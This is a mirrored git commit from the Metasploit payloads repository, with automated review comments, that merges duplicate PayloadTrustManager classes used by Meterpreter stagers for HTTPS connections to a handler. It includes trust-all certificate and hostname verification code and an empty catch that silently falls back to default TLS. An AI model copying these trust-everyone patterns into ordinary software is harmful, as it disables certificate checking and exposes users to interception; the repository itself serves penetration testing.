mirror of https://github.com/rapid7/metasploit-payloads synced 2025-03-12 12:14:29 +01:00

remove duplicated PayloadTrustManager

Tim 2016-09-30 14:13:22 +08:00
parent d411bfc90b
commit 92a598101f
No known key found for this signature in database
GPG Key ID: 62361A8B17EEED19
7 changed files with 24 additions and 86 deletions


@ -15,6 +15,7 @@ import java.net.URL;
import java.net.URLConnection;
import java.util.concurrent.TimeUnit;
import com.metasploit.meterpreter.PayloadTrustManager;
import dalvik.system.DexClassLoader;
public class Payload {
@ -111,7 +112,7 @@ public class Payload {
InputStream inStream;
if (url.startsWith("https")) {
URLConnection uc = new URL(url).openConnection();
Class.forName("com.metasploit.stage.PayloadTrustManager").getMethod("useFor", new Class[]{URLConnection.class}).invoke(null, uc);
PayloadTrustManager.useFor(uc, CERT_HASH);
inStream = uc.getInputStream();
} else {
inStream = new URL(url).openStream();
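Review bot: The direct call `PayloadTrustManager.useFor(uc, CERT_HASH);` and the new `import com.metasploit.meterpreter.PayloadTrustManager;` replace the reflective lookup, but nothing here records that the indirection was deliberate. The class Javadoc of the moved PayloadTrustManager still says it lives in its own class so that JREs without the SSL classes can load Payload. If those runtimes are no longer a target (this file already imports `dalvik.system.DexClassLoader`, so probably not), that Javadoc is stale and should be reworded. Otherwise the reflective call should be kept and only extended to the two-argument signature. The enclosing method starts and ends outside this hunk.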


@ -143,11 +143,6 @@ public class AndroidMeterpreter extends Meterpreter {
this.intervalCollectionManager.stop();
}
@Override
protected String getPayloadTrustManager() {
return "com.metasploit.stage.PayloadTrustManager";
}
@Override
public String[] loadExtension(byte[] data) throws Exception {
getCommandManager().resetNewCommands();


@ -7,7 +7,6 @@ import com.metasploit.meterpreter.Meterpreter;
import com.metasploit.meterpreter.TLVPacket;
import com.metasploit.meterpreter.TLVType;
import com.metasploit.meterpreter.command.Command;
import com.metasploit.stage.PayloadTrustManager;
public class clipboard_set_data implements Command {


@ -17,7 +17,6 @@ public class HttpTransport extends Transport {
private static final int PROXY_USER_LEN = 64;
private static final int PROXY_PASS_LEN = 64;
private static final int CERT_HASH_LEN = 20;
private static final String TRUST_MANAGER = "com.metasploit.meterpreter.PayloadTrustManager";
private URL targetUrl = null;
private URL nextUrl = null;
@ -264,10 +263,12 @@ public class HttpTransport extends Transport {
if (this.targetUrl.getProtocol().equals("https")) {
try {
Class.forName(TRUST_MANAGER).getMethod("useFor", new Class[]{URLConnection.class})
.invoke(null, new Object[]{conn});
}
catch (Exception ex) {
String certHashHex = null;
if (certHash != null) {
certHashHex = PayloadTrustManager.bytesToHex(certHash);
}
PayloadTrustManager.useFor(conn, certHashHex);
} catch (Exception ex) {
// perhaps log?
}
}
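Review bot: The `catch (Exception ex)` around `PayloadTrustManager.useFor(conn, certHashHex);` is still empty apart from `// perhaps log?`, so a failure to install the trust manager is silently ignored. The request then continues on `conn` with the platform's default TLS settings, and a configured `certHash` is never compared against the server certificate. When `certHash != null` the failure should stop the request rather than be swallowed, for example `throw new IOException("certificate hash check could not be installed: " + ex);` if the enclosing method can throw it. That method's signature is outside the hunk. At minimum the comment should say the fallback is intentional: `// best effort: on failure the connection keeps the default trust settings`.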


@ -220,10 +220,6 @@ public class Meterpreter {
}
}
protected String getPayloadTrustManager() {
return "com.metasploit.meterpreter.PayloadTrustManager";
}
/**
* Get the command manager, used to register or lookup commands.
*/


@ -1,64 +0,0 @@
package com.metasploit.meterpreter;
import java.net.URLConnection;
import javax.net.ssl.HostnameVerifier;
import javax.net.ssl.HttpsURLConnection;
import javax.net.ssl.SSLContext;
import javax.net.ssl.SSLSession;
import javax.net.ssl.SSLSocketFactory;
import javax.net.ssl.TrustManager;
import javax.net.ssl.X509TrustManager;
import java.security.cert.X509Certificate;
/**
* Trust manager used for HTTPS URL connection. This is in its own class because it
* depends on classes only present on Sun JRE 1.4+, and incorporating it into
* the main {@link Meterpreter} class would have made it impossible for other/older
* JREs to load it.
* <p/>
* This class is substantically identical to the metasploit.PayloadTrustManager class,
* only that it tries to cache the ssl context and trust manager between calls.
*/
public class PayloadTrustManager implements X509TrustManager, HostnameVerifier {
public X509Certificate[] getAcceptedIssuers() {
// no preferred issuers
return new X509Certificate[0];
}
public void checkClientTrusted(java.security.cert.X509Certificate[] certs, String authType) {
// trust everyone
}
public void checkServerTrusted(java.security.cert.X509Certificate[] certs, String authType) {
// trust everyone
}
public boolean verify(String hostname, SSLSession session) {
// trust everyone
return true;
}
private static PayloadTrustManager instance;
private static SSLSocketFactory factory;
/**
* Called by the {@link Payload} class to modify the given
* {@link URLConnection} so that it uses this trust manager.
*/
public static synchronized void useFor(URLConnection uc) throws Exception {
if (uc instanceof HttpsURLConnection) {
HttpsURLConnection huc = ((HttpsURLConnection) uc);
if (instance == null) {
instance = new PayloadTrustManager();
SSLContext sc = SSLContext.getInstance("SSL");
sc.init(null, new TrustManager[]{instance}, new java.security.SecureRandom());
factory = sc.getSocketFactory();
}
huc.setSSLSocketFactory(factory);
huc.setHostnameVerifier(instance);
}
}
}


@ -31,7 +31,7 @@
* TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
* USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
package com.metasploit.stage;
package com.metasploit.meterpreter;
import java.net.URLConnection;
@ -51,11 +51,17 @@ import java.security.cert.X509Certificate;
/**
* Trust manager used for HTTPS stagers. This is in its own class because it
* depends on classes only present on Sun JRE 1.4+, and incorporating it into
* the main {@link Payload} class would have made it impossible for other/older
* the main Payload class would have made it impossible for other/older
* JREs to load it.
*/
public class PayloadTrustManager implements X509TrustManager, HostnameVerifier {
private String certHash;
private PayloadTrustManager(String certHash) {
this.certHash = certHash;
}
public X509Certificate[] getAcceptedIssuers() {
// no preferred issuers
return new X509Certificate[0];
@ -86,7 +92,11 @@ public class PayloadTrustManager implements X509TrustManager, HostnameVerifier {
public void checkServerTrusted(java.security.cert.X509Certificate[] certs,
String authType) throws CertificateException {
String payloadHash = Payload.CERT_HASH.substring(4).trim();
if (certHash == null) {
// No HandlerSSLCert set on payload, trust everyone
return;
}
String payloadHash = certHash.substring(4).trim();
if (payloadHash.length() == 0) {
// No HandlerSSLCert set on payload, trust everyone
return;
@ -112,13 +122,13 @@ public class PayloadTrustManager implements X509TrustManager, HostnameVerifier {
}
/**
* Called by the {@link Payload} class to modify the given
* Called by the Payload class to modify the given
* {@link URLConnection} so that it uses this trust manager.
*/
public static void useFor(URLConnection uc) throws Exception {
public static void useFor(URLConnection uc, String certHash) throws Exception {
if (uc instanceof HttpsURLConnection) {
HttpsURLConnection huc = ((HttpsURLConnection) uc);
PayloadTrustManager ptm = new PayloadTrustManager();
PayloadTrustManager ptm = new PayloadTrustManager(certHash);
SSLContext sc = SSLContext.getInstance("SSL");
sc.init(null, new TrustManager[]{ptm},
new java.security.SecureRandom());
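Review bot: `String payloadHash = certHash.substring(4).trim();` in `checkServerTrusted` still assumes the layout of `Payload.CERT_HASH` (four leading characters, then the digest), but `useFor(URLConnection uc, String certHash)` now takes the value from any caller. HttpTransport passes the result of `PayloadTrustManager.bytesToHex(certHash)`, whose output is not visible here. If that is plain hex, the first two bytes of the digest are dropped before the comparison. A string shorter than four characters throws `StringIndexOutOfBoundsException` rather than `CertificateException`. Either strip the prefix at the Payload call site so the parameter is always the bare hash, or state the contract on `useFor`: `@param certHash hash string in the Payload.CERT_HASH layout (4-character prefix followed by the hex digest), or null to skip the hash check`. The new field could also be `private final String certHash;`.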